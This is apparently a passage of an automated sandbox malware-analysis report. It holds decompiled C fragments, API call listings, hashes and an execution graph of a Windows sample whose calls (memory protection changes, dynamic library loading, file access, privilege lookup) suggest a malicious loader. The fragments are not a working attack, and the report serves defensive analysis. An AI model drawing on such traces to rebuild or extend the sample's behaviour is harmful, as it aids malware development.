					_t36 = GetLastError();
					0x400000("write failed: %lu\n", _t36);
					return _t36;
				}
				return _t35;
			}








                                                  0x004074c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004074ca
                                                  0x004074d4
                                                  0x00000000
                                                  0x00000000
                                                  0x004074ed
                                                  0x004074f3
                                                  0x004074f3
                                                  0x0040750a
                                                  0x00407520
                                                  0x00407528
                                                  0x00407530
                                                  0x0040753f
                                                  0x00000000
                                                  0x0040753f
                                                  0x00407551
                                                  0x0040755c
                                                  0x00407553
                                                  0x00407553
                                                  0x00407553
                                                  0x00407567
                                                  0x00407582
                                                  0x0040758a
                                                  0x0040758c
                                                  0x00407598
                                                  0x00000000
                                                  0x00407598
                                                  0x004075a0

                                                  APIs
                                                  • WriteFile.KERNEL32(?,10C25DE5,00000000,00000000,00000000,?,0040467F,00000000,0041F000,00000006,?,004074AD,00000000), ref: 00407582
                                                  • GetLastError.KERNEL32(?,0040467F,00000000,0041F000,00000006,?,004074AD,00000000), ref: 0040758C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: write failed: %lu
                                                  • API String ID: 442123175-171016427
                                                  • Opcode ID: 2602b3359f5a1c97a8c33e3dff1b4c6f9208dacf72227efde1db13597fde5908
                                                  • Instruction ID: 7f7a1467d5cdc78d0fed5de39304c31363ad617d69b993743f8251a44aee7515
                                                  • Opcode Fuzzy Hash: 2602b3359f5a1c97a8c33e3dff1b4c6f9208dacf72227efde1db13597fde5908
                                                  • Instruction Fuzzy Hash: 14212A74608248EBCB00CF44C894FEA376AAB48348F14827AF9485B781C775E985CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408370 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timewindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00408370(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				intOrPtr _t16;

				_v8 = 0x32;
				_t16 = _a4;
				if( *((intOrPtr*)(_t16 + 0x84)) == 0 ||  *( *((intOrPtr*)(_a4 + 0x84)) + 0x64) != 0) {
					return _t16;
				} else {
					 *( *((intOrPtr*)(_a4 + 0x84)) + 0x64) = 1;
					if(_a8 == 0) {
						return PostMessageW( *(_a4 + 0xa8), 0x401, 0, 0);
					}
					return SetTimer( *(_a4 + 0xa8), 1, _v8, 0);
				}
			}





                                                  0x00408374
                                                  0x0040837b
                                                  0x00408385
                                                  0x00000000
                                                  0x00408398
                                                  0x004083a1
                                                  0x004083ac
                                                  0x00000000
                                                  0x004083db
                                                  0x00000000
                                                  0x004083c0

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,00000032,00000000), ref: 004083C0
                                                  • PostMessageW.USER32(?,00000401,00000000,00000000), ref: 004083DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: MessagePostTimer
                                                  • String ID: 2
                                                  • API String ID: 2370412193-450215437
                                                  • Opcode ID: a18fc1b7731bf4d073329e2cfda384fe3d80195ac6b973d5940686955f304314
                                                  • Instruction ID: 1a3cc5ff3191fa17380487d510b67bf448f26f83c6958252bb8512d12d28dec7
                                                  • Opcode Fuzzy Hash: a18fc1b7731bf4d073329e2cfda384fe3d80195ac6b973d5940686955f304314
                                                  • Instruction Fuzzy Hash: 0801E870240304EFD714CF44C949FA97BA5BB84705F1481B9FE895F2D1CBB6A985CB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00407060(intOrPtr _a4) {
				intOrPtr _t12;
				long _t15;

				_t12 = _a4;
				if( *((intOrPtr*)(_t12 + 0xb4)) == 0 ||  *(_a4 + 0x10b8) == 0) {
					return _t12;
				} else {
					_t15 = WriteFile( *(_a4 + 0xb4), _a4 + 0xb8,  *(_a4 + 0x10b8), 0, 0);
					if(_t15 == 0) {
						_t15 = GetLastError();
						0x400000("write failed: %lu\n", _t15);
					}
					 *(_a4 + 0x10b8) = 0;
					return _t15;
				}
			}





                                                  0x00407063
                                                  0x0040706d
                                                  0x00000000
                                                  0x0040707d
                                                  0x0040709f
                                                  0x004070a7
                                                  0x004070a9
                                                  0x004070b5
                                                  0x004070b5
                                                  0x004070bd
                                                  0x00000000
                                                  0x004070bd

                                                  APIs
                                                  • WriteFile.KERNEL32(?,-000000B8,?,00000000,00000000,?,004074B6,00000000), ref: 0040709F
                                                  • GetLastError.KERNEL32(?,004074B6,00000000), ref: 004070A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: write failed: %lu
                                                  • API String ID: 442123175-171016427
                                                  • Opcode ID: 7c30e4091a94374a3d57e40e93c3b7cafaa1e4be14747abdff3636f5168e94dc
                                                  • Instruction ID: 34fc5e94583f6a61f05de3f6e92c30e56d12f37a70dfe7f870d3083fb1ee9d0f
                                                  • Opcode Fuzzy Hash: 7c30e4091a94374a3d57e40e93c3b7cafaa1e4be14747abdff3636f5168e94dc
                                                  • Instruction Fuzzy Hash: 61F09670608204ABD704CF44C884FE6376AAB04344F148239FA0D9F2D1C775A9C5CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403FE0(void* __ecx, intOrPtr _a4, char _a8) {
				long _v8;

				_t1 =  &_a8; // 0x403de4
				_v8 = GetWindowLongW(GetDlgItem( *(_a4 + 0xd0),  *_t1), 0);
				return  *((intOrPtr*)(_a4 + 4 + _v8 * 4));
			}




                                                  0x00403fe6
                                                  0x00404001
                                                  0x00404011

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ItemLongWindow
                                                  • String ID: =@
                                                  • API String ID: 3725497266-4161117618
                                                  • Opcode ID: d7efd422da76f9fecfbf2a0be4f8766dd121b7b9569949870b406c8251860258
                                                  • Instruction ID: 4e3f07cf9ba3cc0fe72c9f03c7839fe48ab3161562e0dc5fe5b586f89e4676a2
                                                  • Opcode Fuzzy Hash: d7efd422da76f9fecfbf2a0be4f8766dd121b7b9569949870b406c8251860258
                                                  • Instruction Fuzzy Hash: 17E0B679600208AFC744DF98D989EAA77B8FB48750F14C19DFD098B340DA36AE11DBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:4.4%
                                                  Dynamic/Decrypted Code Coverage:2.3%
                                                  Signature Coverage:4.9%
                                                  Total number of Nodes:654
                                                  Total number of Limit Nodes:81
                                                  execution_graph 32597 420c50 32598 420be0 32597->32598 32602 420c54 32597->32602 32600 420bf1 32598->32600 32604 41fb37 32598->32604 32607 41fa57 32600->32607 32603 420c14 32610 41e177 32604->32610 32606 41fb4f 32606->32600 32608 41fa6d 32607->32608 32623 41e1b7 32607->32623 32608->32603 32613 41eb17 32610->32613 32612 41e193 RtlAllocateHeap 32612->32606 32614 41eb9c 32613->32614 32616 41eb26 32613->32616 32614->32612 32616->32614 32617 418a87 32616->32617 32618 418aa1 32617->32618 32619 418a95 32617->32619 32618->32614 32619->32618 32622 418f07 LdrLoadDll 32619->32622 32621 418bf3 32621->32614 32622->32621 32624 41eb17 LdrLoadDll 32623->32624 32625 41e1d3 RtlFreeHeap 32624->32625 32625->32608 32626 4014e9 32628 4014f0 NtProtectVirtualMemory 32626->32628 32629 401570 32628->32629 32633 422f47 32629->32633 32636 422f39 32629->32636 32630 40157b 32641 41f567 32633->32641 32637 422a43 32636->32637 32638 422f3c 32636->32638 32639 422f52 32638->32639 32640 41f567 24 API calls 32638->32640 32639->32630 32640->32639 32642 41f58d 32641->32642 32655 40b337 32642->32655 32644 41f599 32645 41f5f3 32644->32645 32663 40f577 32644->32663 32645->32630 32647 41f5ae 32648 41f5c1 32647->32648 32675 40f537 32647->32675 32651 41f5d6 32648->32651 32716 41e1f7 32648->32716 32680 40d167 32651->32680 32653 41f5e5 32654 41e1f7 2 API calls 32653->32654 32654->32645 32656 40b344 32655->32656 32719 40b287 32655->32719 32658 40b34b 32656->32658 32731 40b227 32656->32731 32658->32644 32664 40f5a3 32663->32664 33113 40c7e7 32664->33113 32666 40f5b5 33117 40f447 32666->33117 32669 40f5d0 32671 40f5db 32669->32671 32673 41dfd7 2 API calls 32669->32673 32670 40f5e8 32672 40f5f9 32670->32672 32674 41dfd7 2 API calls 32670->32674 32671->32647 32672->32647 32673->32671 32674->32672 32676 418a87 LdrLoadDll 32675->32676 32677 40f556 32676->32677 32678 40f55d 32677->32678 32679 40f55f GetUserGeoID 32677->32679 32678->32648 32679->32648 32681 40d18c 32680->32681 32682 40c7e7 LdrLoadDll 32681->32682 32683 40d1e3 32682->32683 33136 40c467 32683->33136 32685 40d209 32715 40d45a 32685->32715 33145 417fa7 32685->33145 32687 40d24e 32687->32715 33148 409537 32687->33148 32689 40d292 32689->32715 33170 41e047 32689->33170 32693 40d2e8 32694 40d2ef 32693->32694 33182 41db57 32693->33182 32696 41fa57 2 API calls 32694->32696 32698 40d2fc 32696->32698 32698->32653 32699 40d339 32700 41fa57 2 API calls 32699->32700 32701 40d340 32700->32701 32701->32653 32702 40d349 32703 40f607 3 API calls 32702->32703 32704 40d3bd 32703->32704 32704->32694 32705 40d3c8 32704->32705 32706 41fa57 2 API calls 32705->32706 32707 40d3ec 32706->32707 33187 41dba7 32707->33187 32710 41db57 2 API calls 32711 40d427 32710->32711 32711->32715 33192 41d967 32711->33192 32714 41e1f7 2 API calls 32714->32715 32715->32653 32717 41e216 ExitProcess 32716->32717 32718 41eb17 LdrLoadDll 32716->32718 32718->32717 32720 40b29a 32719->32720 32770 41c707 LdrLoadDll 32719->32770 32750 41c5b7 32720->32750 32723 40b2ad 32723->32656 32724 40b2a3 32724->32723 32753 41eec7 32724->32753 32726 40b2ea 32726->32723 32764 40b0c7 32726->32764 32728 40b30a 32771 40ab27 LdrLoadDll 32728->32771 32730 40b31c 32730->32656 32732 40b241 32731->32732 32733 41f1b7 LdrLoadDll 32731->32733 33087 41f1b7 32732->33087 32733->32732 32736 41f1b7 LdrLoadDll 32737 40b268 32736->32737 32738 40f337 32737->32738 32739 40f350 32738->32739 33095 40c667 32739->33095 32741 40f363 33099 41dd27 32741->33099 32745 40f389 32746 40f3b4 32745->32746 33106 41dda7 32745->33106 32747 41dfd7 2 API calls 32746->32747 32749 40b35c 32747->32749 32749->32644 32772 41e147 32750->32772 32754 41eee0 32753->32754 32775 418677 32754->32775 32756 41eef8 32757 41ef01 32756->32757 32814 41ed07 32756->32814 32757->32726 32759 41ef15 32759->32757 32831 41da47 32759->32831 32762 41fa57 2 API calls 32763 41ef70 32762->32763 32763->32726 32767 40b0e1 32764->32767 33065 408927 32764->33065 32766 40b0e8 32766->32728 32767->32766 33078 408be7 32767->33078 32770->32720 32771->32730 32773 41eb17 LdrLoadDll 32772->32773 32774 41c5cc 32773->32774 32774->32724 32776 4189ba 32775->32776 32786 41868b 32775->32786 32776->32756 32779 4187bc 32839 41dea7 32779->32839 32780 41879f 32896 41dfa7 LdrLoadDll 32780->32896 32783 4187e3 32785 41fa57 2 API calls 32783->32785 32784 4187a9 32784->32756 32787 4187ef 32785->32787 32786->32776 32836 41d797 32786->32836 32787->32784 32788 41897e 32787->32788 32790 418994 32787->32790 32794 418887 32787->32794 32789 41dfd7 2 API calls 32788->32789 32792 418985 32789->32792 32905 418397 LdrLoadDll NtReadFile NtClose 32790->32905 32792->32756 32793 4189a7 32793->32756 32795 4188ee 32794->32795 32797 418896 32794->32797 32795->32788 32796 418901 32795->32796 32898 41de27 32796->32898 32799 41889b 32797->32799 32800 4188af 32797->32800 32897 418257 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32799->32897 32801 4188b4 32800->32801 32802 4188cc 32800->32802 32842 4182f7 32801->32842 32802->32792 32854 418017 32802->32854 32807 4188a5 32807->32756 32808 4188c2 32808->32756 32810 418961 32902 41dfd7 32810->32902 32811 4188e4 32811->32756 32813 41896d 32813->32756 32815 41ed22 32814->32815 32816 41ed34 32815->32816 32917 41f9d7 32815->32917 32816->32759 32818 41ed54 32920 417c67 32818->32920 32820 41ed77 32820->32816 32821 417c67 3 API calls 32820->32821 32824 41ed99 32821->32824 32823 41ee21 32825 41ee31 32823->32825 33040 41ea97 LdrLoadDll 32823->33040 32824->32816 32945 418fc7 32824->32945 32956 41e907 32825->32956 32828 41ee5f 33035 41da07 32828->33035 32832 41eb17 LdrLoadDll 32831->32832 32833 41da63 32832->32833 33062 af967a 32833->33062 32834 41da7e 32834->32762 32837 41eb17 LdrLoadDll 32836->32837 32838 418770 32837->32838 32838->32779 32838->32780 32838->32784 32840 41eb17 LdrLoadDll 32839->32840 32841 41dec3 NtCreateFile 32840->32841 32841->32783 32843 418313 32842->32843 32844 41de27 LdrLoadDll 32843->32844 32845 418334 32844->32845 32846 41833b 32845->32846 32847 41834f 32845->32847 32849 41dfd7 2 API calls 32846->32849 32848 41dfd7 2 API calls 32847->32848 32851 418358 32848->32851 32850 418344 32849->32850 32850->32808 32906 41fb77 LdrLoadDll RtlAllocateHeap 32851->32906 32853 418363 32853->32808 32855 418062 32854->32855 32856 418095 32854->32856 32857 41de27 LdrLoadDll 32855->32857 32858 4181e0 32856->32858 32862 4180b1 32856->32862 32859 41807d 32857->32859 32860 41de27 LdrLoadDll 32858->32860 32861 41dfd7 2 API calls 32859->32861 32865 4181fb 32860->32865 32863 418086 32861->32863 32864 41de27 LdrLoadDll 32862->32864 32863->32811 32866 4180cc 32864->32866 32916 41de67 LdrLoadDll 32865->32916 32868 4180d3 32866->32868 32869 4180e8 32866->32869 32870 41dfd7 2 API calls 32868->32870 32871 418103 32869->32871 32872 4180ed 32869->32872 32875 4180dc 32870->32875 32880 41fb37 2 API calls 32871->32880 32882 418108 32871->32882 32876 41dfd7 2 API calls 32872->32876 32873 418235 32874 41dfd7 2 API calls 32873->32874 32877 418240 32874->32877 32875->32811 32878 4180f6 32876->32878 32877->32811 32878->32811 32880->32882 32881 41816e 32883 418185 32881->32883 32915 41dde7 LdrLoadDll 32881->32915 32889 41811a 32882->32889 32907 41df57 32882->32907 32885 4181a1 32883->32885 32886 41818c 32883->32886 32888 41dfd7 2 API calls 32885->32888 32887 41dfd7 2 API calls 32886->32887 32887->32889 32890 4181aa 32888->32890 32889->32811 32891 4181d6 32890->32891 32910 41f857 32890->32910 32891->32811 32893 4181c1 32894 41fa57 2 API calls 32893->32894 32895 4181ca 32894->32895 32895->32811 32896->32784 32897->32807 32899 41eb17 LdrLoadDll 32898->32899 32900 418949 32899->32900 32901 41de67 LdrLoadDll 32900->32901 32901->32810 32903 41dff3 NtClose 32902->32903 32904 41eb17 LdrLoadDll 32902->32904 32903->32813 32904->32903 32905->32793 32906->32853 32908 41df73 NtReadFile 32907->32908 32909 41eb17 LdrLoadDll 32907->32909 32908->32881 32909->32908 32911 41f87b 32910->32911 32912 41f864 32910->32912 32911->32893 32912->32911 32913 41fb37 2 API calls 32912->32913 32914 41f892 32913->32914 32914->32893 32915->32883 32916->32873 33041 41e087 32917->33041 32919 41fa04 32919->32818 32921 417c78 32920->32921 32922 417c80 32920->32922 32921->32820 32944 417f53 32922->32944 33044 420b17 32922->33044 32924 417cd4 32925 420b17 2 API calls 32924->32925 32928 417cdf 32925->32928 32926 417d2d 32929 420b17 2 API calls 32926->32929 32928->32926 33049 420bb7 LdrLoadDll RtlAllocateHeap RtlFreeHeap 32928->33049 32930 417d41 32929->32930 32931 420b17 2 API calls 32930->32931 32933 417db4 32931->32933 32932 420b17 2 API calls 32940 417dfc 32932->32940 32933->32932 32935 417f2b 33051 420b77 LdrLoadDll RtlFreeHeap 32935->33051 32937 417f35 33052 420b77 LdrLoadDll RtlFreeHeap 32937->33052 32939 417f3f 33053 420b77 LdrLoadDll RtlFreeHeap 32939->33053 33050 420b77 LdrLoadDll RtlFreeHeap 32940->33050 32942 417f49 33054 420b77 LdrLoadDll RtlFreeHeap 32942->33054 32944->32820 32946 418fd8 32945->32946 32947 418677 8 API calls 32946->32947 32949 418fee 32947->32949 32948 418ff7 32948->32823 32949->32948 32950 41902e 32949->32950 32953 41907a 32949->32953 32951 41fa57 2 API calls 32950->32951 32952 41903f 32951->32952 32952->32823 32954 41fa57 2 API calls 32953->32954 32955 41907f 32954->32955 32955->32823 32957 41e91b 32956->32957 32958 41e797 LdrLoadDll 32956->32958 33055 41e797 32957->33055 32958->32957 32960 41e924 32961 41e797 LdrLoadDll 32960->32961 32962 41e92d 32961->32962 32963 41e797 LdrLoadDll 32962->32963 32964 41e936 32963->32964 32965 41e797 LdrLoadDll 32964->32965 32966 41e93f 32965->32966 32967 41e797 LdrLoadDll 32966->32967 32968 41e948 32967->32968 32969 41e797 LdrLoadDll 32968->32969 32970 41e954 32969->32970 32971 41e797 LdrLoadDll 32970->32971 32972 41e95d 32971->32972 32973 41e797 LdrLoadDll 32972->32973 32974 41e966 32973->32974 32975 41e797 LdrLoadDll 32974->32975 32976 41e96f 32975->32976 32977 41e797 LdrLoadDll 32976->32977 32978 41e978 32977->32978 32979 41e797 LdrLoadDll 32978->32979 32980 41e981 32979->32980 32981 41e797 LdrLoadDll 32980->32981 32982 41e98d 32981->32982 32983 41e797 LdrLoadDll 32982->32983 32984 41e996 32983->32984 32985 41e797 LdrLoadDll 32984->32985 32986 41e99f 32985->32986 32987 41e797 LdrLoadDll 32986->32987 32988 41e9a8 32987->32988 32989 41e797 LdrLoadDll 32988->32989 32990 41e9b1 32989->32990 32991 41e797 LdrLoadDll 32990->32991 32992 41e9ba 32991->32992 32993 41e797 LdrLoadDll 32992->32993 32994 41e9c6 32993->32994 32995 41e797 LdrLoadDll 32994->32995 32996 41e9cf 32995->32996 32997 41e797 LdrLoadDll 32996->32997 32998 41e9d8 32997->32998 32999 41e797 LdrLoadDll 32998->32999 33000 41e9e1 32999->33000 33001 41e797 LdrLoadDll 33000->33001 33002 41e9ea 33001->33002 33003 41e797 LdrLoadDll 33002->33003 33004 41e9f3 33003->33004 33005 41e797 LdrLoadDll 33004->33005 33006 41e9ff 33005->33006 33007 41e797 LdrLoadDll 33006->33007 33008 41ea08 33007->33008 33009 41e797 LdrLoadDll 33008->33009 33010 41ea11 33009->33010 33011 41e797 LdrLoadDll 33010->33011 33012 41ea1a 33011->33012 33013 41e797 LdrLoadDll 33012->33013 33014 41ea23 33013->33014 33015 41e797 LdrLoadDll 33014->33015 33016 41ea2c 33015->33016 33017 41e797 LdrLoadDll 33016->33017 33018 41ea38 33017->33018 33019 41e797 LdrLoadDll 33018->33019 33020 41ea41 33019->33020 33021 41e797 LdrLoadDll 33020->33021 33022 41ea4a 33021->33022 33023 41e797 LdrLoadDll 33022->33023 33024 41ea53 33023->33024 33025 41e797 LdrLoadDll 33024->33025 33026 41ea5c 33025->33026 33027 41e797 LdrLoadDll 33026->33027 33028 41ea65 33027->33028 33029 41e797 LdrLoadDll 33028->33029 33030 41ea71 33029->33030 33031 41e797 LdrLoadDll 33030->33031 33032 41ea7a 33031->33032 33033 41e797 LdrLoadDll 33032->33033 33034 41ea83 33033->33034 33034->32828 33036 41eb17 LdrLoadDll 33035->33036 33037 41da23 33036->33037 33061 af9860 LdrInitializeThunk 33037->33061 33038 41da3a 33038->32759 33040->32825 33042 41e0a3 NtAllocateVirtualMemory 33041->33042 33043 41eb17 LdrLoadDll 33041->33043 33042->32919 33043->33042 33045 420b27 33044->33045 33046 420b2d 33044->33046 33045->32924 33047 41fb37 2 API calls 33046->33047 33048 420b53 33047->33048 33048->32924 33049->32928 33050->32935 33051->32937 33052->32939 33053->32942 33054->32944 33056 41e7b2 33055->33056 33057 418a87 LdrLoadDll 33056->33057 33058 41e7d2 33057->33058 33059 418a87 LdrLoadDll 33058->33059 33060 41e886 33058->33060 33059->33060 33060->32960 33061->33038 33063 af968f LdrInitializeThunk 33062->33063 33064 af9681 33062->33064 33063->32834 33064->32834 33066 408932 33065->33066 33067 408937 33065->33067 33066->32767 33068 41f9d7 2 API calls 33067->33068 33071 40895c 33068->33071 33069 4089bf 33069->32767 33070 41da07 2 API calls 33070->33071 33071->33069 33071->33070 33072 4089c5 33071->33072 33077 41f9d7 2 API calls 33071->33077 33081 41e107 33071->33081 33073 4089eb 33072->33073 33075 41e107 2 API calls 33072->33075 33073->32767 33076 4089dc 33075->33076 33076->32767 33077->33071 33079 41e107 2 API calls 33078->33079 33080 408c05 33079->33080 33080->32728 33082 41eb17 LdrLoadDll 33081->33082 33083 41e123 33082->33083 33086 af96e0 LdrInitializeThunk 33083->33086 33084 41e13a 33084->33071 33086->33084 33088 41f1da 33087->33088 33091 40c317 33088->33091 33092 40c33b 33091->33092 33093 40c377 LdrLoadDll 33092->33093 33094 40b252 33092->33094 33093->33094 33094->32736 33096 40c68a 33095->33096 33097 40c707 33096->33097 33111 41d7d7 LdrLoadDll 33096->33111 33097->32741 33100 41eb17 LdrLoadDll 33099->33100 33101 40f372 33100->33101 33101->32749 33102 41e317 33101->33102 33103 41eb17 LdrLoadDll 33102->33103 33104 41e336 LookupPrivilegeValueW 33103->33104 33104->32745 33107 41ddc3 33106->33107 33108 41eb17 LdrLoadDll 33106->33108 33112 af9910 LdrInitializeThunk 33107->33112 33108->33107 33109 41dde2 33109->32746 33111->33097 33112->33109 33114 40c80e 33113->33114 33115 40c667 LdrLoadDll 33114->33115 33116 40c871 33115->33116 33116->32666 33118 40f461 33117->33118 33126 40f517 33117->33126 33119 40c667 LdrLoadDll 33118->33119 33120 40f483 33119->33120 33127 41da87 33120->33127 33122 40f4c5 33130 41dac7 33122->33130 33125 41dfd7 2 API calls 33125->33126 33126->32669 33126->32670 33128 41daa3 33127->33128 33129 41eb17 LdrLoadDll 33127->33129 33128->33122 33129->33128 33131 41eb17 LdrLoadDll 33130->33131 33132 41dae3 33131->33132 33135 af9fe0 LdrInitializeThunk 33132->33135 33133 40f50b 33133->33125 33135->33133 33137 40c474 33136->33137 33138 40c478 33136->33138 33137->32685 33139 40c491 33138->33139 33140 40c4c3 33138->33140 33197 41d817 LdrLoadDll 33139->33197 33198 41d817 LdrLoadDll 33140->33198 33142 40c4d4 33142->32685 33144 40c4b3 33144->32685 33146 40f607 3 API calls 33145->33146 33147 417fcd 33145->33147 33146->33147 33147->32687 33199 409767 33148->33199 33150 40975d 33150->32689 33151 409555 33151->33150 33152 409633 33151->33152 33153 408927 4 API calls 33151->33153 33152->33150 33154 408927 4 API calls 33152->33154 33169 409713 33152->33169 33163 409593 33153->33163 33159 409670 33154->33159 33156 409727 33156->33150 33247 40f877 10 API calls 33156->33247 33158 40973d 33158->33150 33248 40f877 10 API calls 33158->33248 33165 409217 17 API calls 33159->33165 33167 409709 33159->33167 33159->33169 33161 409753 33161->32689 33163->33152 33164 409629 33163->33164 33213 409217 33163->33213 33166 408be7 2 API calls 33164->33166 33165->33159 33166->33152 33168 408be7 2 API calls 33167->33168 33168->33169 33169->33150 33246 40f877 10 API calls 33169->33246 33171 41eb17 LdrLoadDll 33170->33171 33172 41e063 33171->33172 33386 af98f0 LdrInitializeThunk 33172->33386 33173 40d2c9 33175 40f607 33173->33175 33176 40f624 33175->33176 33387 41db07 33176->33387 33179 40f66c 33179->32693 33180 41db57 2 API calls 33181 40f695 33180->33181 33181->32693 33183 41db73 33182->33183 33184 41eb17 LdrLoadDll 33182->33184 33393 af9780 LdrInitializeThunk 33183->33393 33184->33183 33185 40d32c 33185->32699 33185->32702 33188 41eb17 LdrLoadDll 33187->33188 33189 41dbc3 33188->33189 33394 af97a0 LdrInitializeThunk 33189->33394 33190 40d400 33190->32710 33193 41eb17 LdrLoadDll 33192->33193 33194 41d983 33193->33194 33395 af9a20 LdrInitializeThunk 33194->33395 33195 40d453 33195->32714 33197->33144 33198->33142 33200 40978e 33199->33200 33201 408927 4 API calls 33200->33201 33208 4099e3 33200->33208 33202 4097e1 33201->33202 33203 408be7 2 API calls 33202->33203 33202->33208 33204 409870 33203->33204 33205 408927 4 API calls 33204->33205 33204->33208 33206 409885 33205->33206 33207 408be7 2 API calls 33206->33207 33206->33208 33210 4098e5 33207->33210 33208->33151 33209 408927 4 API calls 33209->33210 33210->33208 33210->33209 33211 409217 17 API calls 33210->33211 33212 408be7 2 API calls 33210->33212 33211->33210 33212->33210 33214 40923c 33213->33214 33249 41d857 33214->33249 33217 409290 33217->33163 33218 409311 33284 40f757 LdrLoadDll NtClose 33218->33284 33219 41da47 2 API calls 33220 4092b4 33219->33220 33220->33218 33224 4092bf 33220->33224 33222 40932c 33225 409333 33222->33225 33226 409349 33222->33226 33223 40933d 33223->33163 33224->33223 33252 40d467 33224->33252 33228 41dfd7 2 API calls 33225->33228 33285 41d8d7 LdrLoadDll 33226->33285 33228->33223 33229 4092d9 33229->33223 33272 409047 33229->33272 33231 409374 33233 40d467 5 API calls 33231->33233 33235 409394 33233->33235 33235->33223 33286 41d907 LdrLoadDll 33235->33286 33237 4093b9 33287 41d997 LdrLoadDll 33237->33287 33239 4093d3 33240 41d967 2 API calls 33239->33240 33241 4093e2 33240->33241 33242 41dfd7 2 API calls 33241->33242 33243 4093ec 33242->33243 33288 408e17 33243->33288 33245 409400 33245->33163 33246->33156 33247->33158 33248->33161 33250 409286 33249->33250 33251 41eb17 LdrLoadDll 33249->33251 33250->33217 33250->33218 33250->33219 33251->33250 33253 40d492 33252->33253 33254 40f607 3 API calls 33253->33254 33255 40d4f1 33254->33255 33256 41db57 2 API calls 33255->33256 33265 40d53a 33255->33265 33257 40d51c 33256->33257 33258 40d523 33257->33258 33260 40d546 33257->33260 33259 41dba7 2 API calls 33258->33259 33261 40d530 33259->33261 33263 40d5b0 33260->33263 33264 40d590 33260->33264 33262 41dfd7 2 API calls 33261->33262 33262->33265 33267 41dba7 2 API calls 33263->33267 33266 41dfd7 2 API calls 33264->33266 33265->33229 33269 40d59d 33266->33269 33268 40d5c2 33267->33268 33270 41dfd7 2 API calls 33268->33270 33269->33229 33271 40d5cc 33270->33271 33271->33229 33273 40905d 33272->33273 33304 41d377 33273->33304 33275 409076 33280 4091e8 33275->33280 33325 408c27 33275->33325 33277 40915c 33278 408e17 11 API calls 33277->33278 33277->33280 33279 40918a 33278->33279 33279->33280 33281 41da47 2 API calls 33279->33281 33280->33163 33282 4091bf 33281->33282 33282->33280 33283 41e047 2 API calls 33282->33283 33283->33280 